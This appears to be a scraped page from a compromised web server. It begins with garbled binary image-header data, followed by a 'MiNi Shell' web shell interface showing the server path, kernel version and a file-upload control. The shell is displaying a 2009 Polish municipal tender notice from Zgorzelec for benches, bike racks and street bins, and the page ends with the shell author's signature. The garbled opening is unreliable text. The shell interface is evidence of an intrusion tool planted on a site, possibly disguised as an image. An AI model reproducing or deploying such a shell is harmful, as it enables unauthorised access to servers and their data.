JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090720/244536-N-2009.html

<p class="kh_header"><b>Zgorzelec: Dostawa ławek, parkingów rowerowych, koszy ulicznych</b><br>
<b>Numer ogłoszenia: 244536 - 2009; data zamieszczenia: 20.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa ławek, parkingów rowerowych, koszy ulicznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia  jest  dostawa ławek, parkingów rowerowych, koszy 
    ulicznych wraz z rozładunkiem przez Wykonawcę w miejscu wskazanym przez 
    pracownika Wydziału Środowiska i Spraw Mieszkaniowych tut. Urzędu w 
    następujących ilościach: 
    a)  40 szt. ławek z oparciem,  
    b)  30 szt. ławek bez oparcia, 
    c)    3 szt. parkingów rowerowych na 5 rowerów każdy, 
    d)    3 szt. ławek na podstawie betonowej, 
    e)    3 szt. donic betonowych, 
    f) 200 szt. koszy ulicznych na śmieci uniwersalne, 
    g)     6 szt. koszy ulicznych na śmieci stylizowane.           
2.Parametry techniczne urządzeń zostały określone w  załączniku nr 5 do 
   SIWZ.          
3.Zamawiający nie określa wymagań dotyczących gatunku drewna z jakiego mają 
   być wykonane siedziska ławek. 
4.Wykonawca ma obowiązek dostarczyć przedmiot zamówienia spełniający 
   parametry techniczne zawarte w załączniku nr 5 do SIWZ. 
5.Zamawiający wymaga, aby oferowany przedmiot zamówienia był:
   - wysokiej jakości, 
   - fabrycznie nowy, 
   - nie noszący śladów uszkodzeń zewnętrznych oraz uprzedniego używania.   
6.Wykonawca jest zobowiązany powiadomić Zamawiającego telefonicznie lub 
   pisemnie, o gotowości do dostawy w terminie 7 dni przed terminem realizacji 
   dostawy.   
7.Odbiór przedmiotu zamówienia odbędzie się w obecności Zamawiającego i 
   Wykonawcy, potwierdzony protokołem odbioru dostawy  po sprawdzeniu jego ilości 
   i jakości. 
8.Zamawiający wymaga na dostarczony przedmiot zamówienia gwarancji jakości  na 
   okres min. 12 miesięcy, liczony  od dnia podpisania protokołu odbioru w/w 
   dostawy.       
Zamówienie powyżej 14.000 euro a poniżej kwot określonych w art. 11 ust. 8 Pzp..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.11.36.00-3, 28.51.29.50-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  Warunki udziału w postępowaniu
1.1 O udzielenie Zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki 
udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp,  i nie podlegają   
wykluczeniu na podstawie art. 24 ust. 1 i 2 oraz złożą dokumenty potwierdzające 
spełnienie  tych warunków.
    
W szczególności zamawiający wymaga, aby wykonawcy wykazali, że:
1/  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli
     ustawy nakładają obowiązek posiadania takich uprawnień,
2/  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
     technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią 
     pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
     technicznego i osób   zdolnych do wykonania zamówienia
3/  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
     zamówienia,  
4/ nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
1.2 Opis sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu:      
Zamawiający dokona oceny spełnienia każdego z  warunków na podstawie 
załączonych do oferty dokumentów, o których mowa w pkt. 2  metodą 
spełnia / nie  spełnia.
Brak załączenia przez wykonawcę któregokolwiek z dokumentów zostanie uznane
przez zamawiającego jako niespełnienie warunku, co będzie skutkować           
wykluczeniem  wykonawcy z postępowania, z zastrzeżeniem art.  26 ust. 3 Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 2. Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy 
    w celu potwierdzenia spełnienia warunków udziału w postępowaniu;        
    zgodny z  wymogami art. 22 ust. 1 ustawy Prawo zamówień publicznych i  treścią  
    Rozporządzenia  Prezesa Rady  Ministrów z dnia 19 maja 2006 r.   w sprawie 
    rodzajów dokumentów,  jakich może  żądać  zamawiający od wykonawcy  oraz 
    form,  w jakich te dokumenty mogą być  składane  (Dz. U. z 2006r. Nr 87, poz. 
    605 oraz Dz. U. z  2008r. Nr 171, poz. 1058).

2.1W celu potwierdzenia, warunku udziału w postępowaniu określonego w pkt. 1.1 
    podpunkt 1, Zamawiający żąda załączenia :    
   
   1/aktualnego  odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie 
      do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
      do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego 
      nie wcześniej niż 6  miesięcy przed upływem terminu składania wniosków o 
      dopuszczenie  do udziału w   postępowaniu o udzielenie zamówienia albo 
      składania ofert (§ 1 ust.1,  pkt 2  rozporządzenia Prezesa Rady Ministrów z dnia 
      24 maja 2006r.  Dz.U. Nr 87,  poz. 605) .
      Za aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
      ewidencji działalności gospodarczej uznaje się zarówno dokument wystawiony 
      odpowiednio nie wcześniej  niż sześć m-cy przed upływem terminu składania 
      ofert, jak również dokument, wystawiony  w okresie wcześniejszym, jeżeli 
      istnienie określonych w  nim okoliczności potwierdzone   zostanie przez właściwy 
      organ w wymaganym terminie i  opatrzone urzędową adnotacją  potwierdzającą  
      jego aktualność.   
 Uwaga! W przypadku składania oferty przez Wykonawców występujących 
            wspólnie,    w/w  dokument składa każdy z przedsiębiorców  tworzących
            konsorcjum.
   2/ zaświadczenia z Krajowego Rejestru Karnego
       a/  w zakresie określonym w art. 24 ust. 1 pkt  4-8   ustawy Pzp, wystawione 
            nie wcześniej niż  6  miesięcy przed  terminem składania  ofert, 
       b/  zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 
            24 ust.1 pkt 9  ustawy Pzp, wystawione nie wcześniej niż  6 miesięcy przed 
            terminem składania ofert (§ 1  ust 1. pkt 4 i 5 rozporządzenia Prezesa Rady 
            Ministrów z dnia 24 maja 2006 r. Dz.U. Nr  87,  poz.   605) 
Uwaga! W przypadku składania oferty przez Wykonawców występujących wspólnie, 
           w/w  dokument składa każdy z przedsiębiorców  tworzących konsorcjum.

Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium 
Rzeczypospolitej   Polskiej, zamiast dokumentów, o których mowa w pkt. 2.1  
podpunkty   1 i 2b składa dokument lub dokumenty wystawione w kraju, w którym ma  siedzibę  lub  miejsce  zamieszkania, potwierdzające  odpowiednio że:
-nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej   niż  6 miesięcy przed upływem terminu składania ofert, 
-nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione nie  wcześniej niż 6  miesięcy przed upływem terminu składania ofert. 
W zakresie dokumentu określonego w pkt. 2.1 podpunkt 2a Wykonawca składa   
zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub
miejsce zamieszkania, nie wydaje się wyżej wymienionych dokumentów, zastępuje się
je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym 
organem sądowym, administracyjnym albo organem samorządu zawodowego lub 
gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca   ma siedzibę lub miejsce zamieszkania, wystawiony nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert.

2.2 W celu potwierdzenia, warunku udziału w postępowaniu określonego w pkt. 1.1
      podpunkt 2,  Zamawiający żąda:
      1) wykazu  wykonanych   a w przypadku świadczeń okresowych lub ciągłych 
          również  wykonywanych, dostaw  w okresie ostatnich trzech lat przed dniem 
          wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia 
          działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i 
          wartością dostaw stanowiącym przedmiot  zamówienia,  z podaniem ich 
          wartości oraz  daty i miejsca wykonania oraz załączeniem  dokumentów   
          potwierdzających,  że dostawy te zostały wykonane   należycie   -  wg 
          załącznika  nr 4   do SIWZ
Zamawiający wymaga, aby  wykaz zawierał: 
- dwie dostawy zgodne z przedmiotem zamówienia tj. dostawa ławek i koszy 
  ulicznych metalowych o łącznej wartości nie mniejszej  niż  50 000,00 zł.  
  W w/w wykazie w pozycji wartość brutto zrealizowanych dostaw, należy 
  wpisać wartość  dostawy ławek i koszy ulicznych metalowych.      
Uwaga! W przypadku składania oferty przez Wykonawców występujących 
           wspólnie, w/w  warunek, musi spełnić co najmniej jeden z 
            przedsiębiorców. 
2.3 W celu potwierdzenia, warunku udziału w postępowaniu określonego  w pkt. 
     1.1 Zamawiający żąda:      
     1) oświadczenia Wykonawcy, o spełnieniu warunków udziału w postępowaniu 
         zgodnie  z art. 22 ust. 1 i nie podleganiu wykluczeniu z art. 24 ust. 1 i 2 
         ustawy Pzp. złożone na formularzu stanowiącym załącznik nr 3  do SIWZ . 
         Wykonawcy,  którzy wspólnie ubiegają się o udzielenie zamówienia wypełniają 
         załącznik nr 3A.
 2.4	W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom 
        określonym przez Zamawiającego, na podstawie  art. 25 ust. 1 pkt. 2 ustawy 
        Pzp,  Zamawiający żąda załączenia do oferty kart katalogowych  producenta, 
        zdjęć  lub innych dokumentów zawierających parametry techniczne 
        oferowanych  produktów. 
        Przez kartę katalogową produktu rozumie się wydruk ze strony producenta 
        wraz z odnośnikiem lub oryginalną kartę papierową producenta. W przypadku 
        braku parametrów technicznych w wydruku ze strony www lub w karcie, 
        Wykonawca musi dostarczyć kartę katalogową od producenta uwzględniającą 
        wszystkie parametry techniczne oferowanego produktu. Uzupełnieniem karty 
        katalogowej danego produktu może być także oryginalna aktualna instrukcja 
        techniczna oferowanego produktu.   

3.Wymagania dotyczące oferty
    Do oferty Wykonawca musi złożyć następujące dokumenty:   
    1.  wypełniony i podpisany formularz ofertowy (wg. załączonego wzoru), 
    2.  informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ
         (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków 
          konsorcjum), 
    3. oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
        zamówień   publicznych - załącznik nr 2 do SIWZ,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec
ul. Domańskiego 6 pokój nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2009 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
Punkt Obsługi Interesanta
59-900 Zgorzelec
ul. Domańskiego 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com